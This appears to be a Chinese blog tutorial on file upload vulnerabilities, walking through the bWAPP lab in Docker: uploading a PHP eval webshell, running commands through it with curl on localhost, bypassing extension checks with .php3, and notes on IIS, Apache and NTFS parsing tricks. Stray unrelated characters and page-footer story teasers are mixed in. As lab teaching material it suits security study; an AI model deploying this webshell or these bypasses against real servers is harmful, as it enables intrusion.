文件上傳漏洞

文件上傳漏洞是什么?

文件上傳漏洞是在開發(fā)者沒有做充足驗證情況下,允許用戶上傳惡意文件,這里上傳的文件可以是木馬、病毒钾麸、惡意腳本或者webshell等碾牌。

部署靶機環(huán)境

下載鏡像

docker search bwapp # 搜索鏡像
docker pull raesene/bwapp # 拉取鏡像
docker run -d -p 12345:80 raesene/bwapp # 創(chuàng)建容器
docker ps # 確認(rèn)容器是否正常運行
docker container list -a|grep bwapp # 查看容器id
docker start container_id # 啟動容器,如果容器已經(jīng)啟動,就無需這部操作
docker exec -it container_id bash # 進入容器,修改文件的權(quán)限,否在無法上傳文件

在進入容器之后,需要對文件的目錄權(quán)限進行變更,否則無法進行上傳操作

root@137640210dd6:/app# cd ..
root@137640210dd6:/# chown -R www-data:www-data app

系統(tǒng)初始化

在瀏覽器中輸入http://localhost:12345/install.php,進入安全頁面,選擇安裝按鈕,對應(yīng)用進行初始化。

image.png

創(chuàng)建用戶

在初始化成功之后草巡,跳轉(zhuǎn)到create user頁面,填寫完信息之后,不要勾選驗證郵件這一項型酥,點擊創(chuàng)建:


image.png

文件上傳

上傳漏洞

登錄應(yīng)用之后,選擇Unrestricted File Upload 然后點擊hack按鈕,進入Unrestricted File Upload 頁面,


image.png

上傳一個文件shell.php文件捷犹,并進行查看,在預(yù)覽頁面中沒有任何內(nèi)容展示冕末,因為上傳的文件不是一個文本文件,而是一個文件,文件內(nèi)容為:

<?php @eval($_POST['hacker']); ?>%

在php中萍歉,eval是一個特殊的關(guān)鍵字,將一個字符串變成php的運行代碼。

<?php @eval($_POST['hacker']); ?> 中的@eval($_POST['hacker']);是要接收post的數(shù)據(jù)档桃,變量為hacker
image.png
curl -d "hacker=echo get_current_user();" http://localhost:12345/images/shell.php # 獲取當(dāng)前用戶
curl -d "hacker=echo getcwd();" http://localhost:12345/images/shell.php  # 獲取當(dāng)前的目錄

后綴名跳過

將安全級別設(shè)置為medium枪孩,將無法上傳shell.php文件:


image.png

將shell.php 變成shell.php3,在重新上傳文件:


image.png

文件成功上傳
image.png

將shell.php 變成shell.php30,在重新上傳文件:


image.png

文件內(nèi)容可以在預(yù)覽里面看見,因為應(yīng)用把shell.php30當(dāng)作一個文本文件,直接展示內(nèi)容藻肄。
查看容器內(nèi)部的文件:
docker container list -a|grep bwapp # 查看容器id
docker exec -it container_id bash # 進入容器,修改文件的權(quán)限,否在無法上傳文件
cd /etc/apache2/
cat apache2.conf |grep conf 

通過apache2.conf文件中蔑舞,可以看到加載的mod有哪些,查看支持的php配置文件位置和內(nèi)容

cd /etc/apache2/mods-enabled
cat php5.conf

php5.conf文件內(nèi)容

<FilesMatch ".+\.ph(p[345]?|t|tml)$">
    SetHandler application/x-httpd-php
</FilesMatch>
<FilesMatch ".+\.phps$">
    SetHandler application/x-httpd-php-source
    Order Deny,Allow
    Deny from all
</FilesMatch>
<FilesMatch "^\.ph(p[345]?|t|tml|ps)$">
    Order Deny,Allow
    Deny from all
</FilesMatch>
<IfModule mod_userdir.c>
    <Directory /home/*/public_html>
        php_admin_flag engine Off
    </Directory>
</IfModule>

通過配置文件可以看到嘹屯,如果后綴名字為php3攻询、php4、php5都會解析為PHP文件州弟,php30是無法解析為php文件的钧栖。

前端繞過

ISS 5.x/6 解析漏洞

漏洞1:當(dāng)創(chuàng)建.asp的文件目錄的時候,在此目錄下的任意文件,服務(wù)器都解析為asp文件
漏洞2:服務(wù)器默認(rèn)不解析;以后的內(nèi)容
漏洞利用形式:
漏洞1: www.xx.com/xx.asp/xx.jpg 會被解析成asp文件
漏洞2: www.xx.com/xx.asp;.jpg 會被解析為asp文件

Apache漏洞

Apache 在1.x和2.x版本中存在解析漏洞:
Apache從右至左開始判斷后綴低零,跳過非可識別后綴,直到找到可識別后綴為止拯杠,
然后將該可識別后綴進解析掏婶。

前端驗證繞過

利用方式:
1.使用Burp Suite來攔截請求,將請求進行修改;
2.通過chrome禁止/刪除js代碼。

Windows文件流

什么是Windows文件流潭陪?
NTFS文件系統(tǒng)實現(xiàn)了多文件流特性雄妥,NTFS環(huán)境一個文件默認(rèn)使用的是未命名的文件流,同時可創(chuàng)建其他命名的文件流依溯,Windows資源管理器默認(rèn)不顯示出文件的命名文件流老厌,這些命名的文件流在功能上和默認(rèn)使用的未命名文件流一致,甚至可以用來啟動程序黎炉。

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末枝秤,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子拜隧,更是在濱河造成了極大的恐慌宿百,老刑警劉巖趁仙,帶你破解...
    沈念sama閱讀 217,185評論 6 503
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件洪添,死亡現(xiàn)場離奇詭異,居然都是意外死亡雀费,警方通過查閱死者的電腦和手機干奢,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,652評論 3 393
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來盏袄,“玉大人忿峻,你說我怎么就攤上這事≡穑” “怎么了逛尚?”我有些...
    開封第一講書人閱讀 163,524評論 0 353
  • 文/不壞的土叔 我叫張陵,是天一觀的道長刁愿。 經(jīng)常有香客問我绰寞,道長,這世上最難降的妖魔是什么铣口? 我笑而不...
    開封第一講書人閱讀 58,339評論 1 293
  • 正文 為了忘掉前任滤钱,我火速辦了婚禮,結(jié)果婚禮上脑题,老公的妹妹穿的比我還像新娘件缸。我一直安慰自己,他們只是感情好叔遂,可當(dāng)我...
    茶點故事閱讀 67,387評論 6 391
  • 文/花漫 我一把揭開白布他炊。 她就那樣靜靜地躺著争剿,像睡著了一般。 火紅的嫁衣襯著肌膚如雪佑稠。 梳的紋絲不亂的頭發(fā)上秒梅,一...
    開封第一講書人閱讀 51,287評論 1 301
  • 那天,我揣著相機與錄音舌胶,去河邊找鬼捆蜀。 笑死,一個胖子當(dāng)著我的面吹牛幔嫂,可吹牛的內(nèi)容都是我干的辆它。 我是一名探鬼主播,決...
    沈念sama閱讀 40,130評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼履恩,長吁一口氣:“原來是場噩夢啊……” “哼锰茉!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起切心,我...
    開封第一講書人閱讀 38,985評論 0 275
  • 序言:老撾萬榮一對情侶失蹤飒筑,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后绽昏,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體协屡,經(jīng)...
    沈念sama閱讀 45,420評論 1 313
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,617評論 3 334
  • 正文 我和宋清朗相戀三年全谤,在試婚紗的時候發(fā)現(xiàn)自己被綠了肤晓。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 39,779評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡认然,死狀恐怖补憾,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情卷员,我是刑警寧澤盈匾,帶...
    沈念sama閱讀 35,477評論 5 345
  • 正文 年R本政府宣布,位于F島的核電站毕骡,受9級特大地震影響削饵,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜挺峡,卻給世界環(huán)境...
    茶點故事閱讀 41,088評論 3 328
  • 文/蒙蒙 一葵孤、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧橱赠,春花似錦尤仍、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,716評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽苏遥。三九已至,卻和暖如春赡模,著一層夾襖步出監(jiān)牢的瞬間田炭,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,857評論 1 269
  • 我被黑心中介騙來泰國打工漓柑, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留教硫,地道東北人。 一個月前我還...
    沈念sama閱讀 47,876評論 2 370
  • 正文 我出身青樓辆布,卻偏偏與公主長得像瞬矩,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子锋玲,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 44,700評論 2 354

推薦閱讀更多精彩內(nèi)容

  • 0x01 文件上傳漏洞 文件上傳漏洞顧名思義就是用戶上傳一個可執(zhí)行的腳本文件景用,獲得了執(zhí)行服務(wù)器端命令的能力。通常惭蹂,...
    Pino_HD閱讀 1,907評論 0 0
  • 文件上傳漏洞是指用戶上傳了一個可執(zhí)行的腳本文件伞插,并通過此腳本文件獲得了執(zhí)行服務(wù)器端命令的能力。這種攻擊方式是最為直...
    付出從未后悔閱讀 1,142評論 0 4
  • 文件上傳漏洞 文件上傳漏洞就是用戶上傳一個可執(zhí)行的文件腳本盾碗,并通過腳本獲得執(zhí)行服務(wù)器端命令的的能力媚污。 上傳的文件可...
    L1E6N0A2閱讀 1,425評論 0 2
  • 文件上傳漏洞類型分類 如何判斷上傳漏洞類型? 本次實現(xiàn)使用的靶場系統(tǒng)是upload-labs upload-la...
    Admin3K閱讀 1,146評論 0 2
  • 0x00 介紹 文件上傳漏洞是Web漏洞類型中最常見的一種,也是最容易獲得服務(wù)器權(quán)限的漏洞之一置尔。當(dāng)網(wǎng)站上傳功能設(shè)計...
    Franchen閱讀 1,655評論 0 7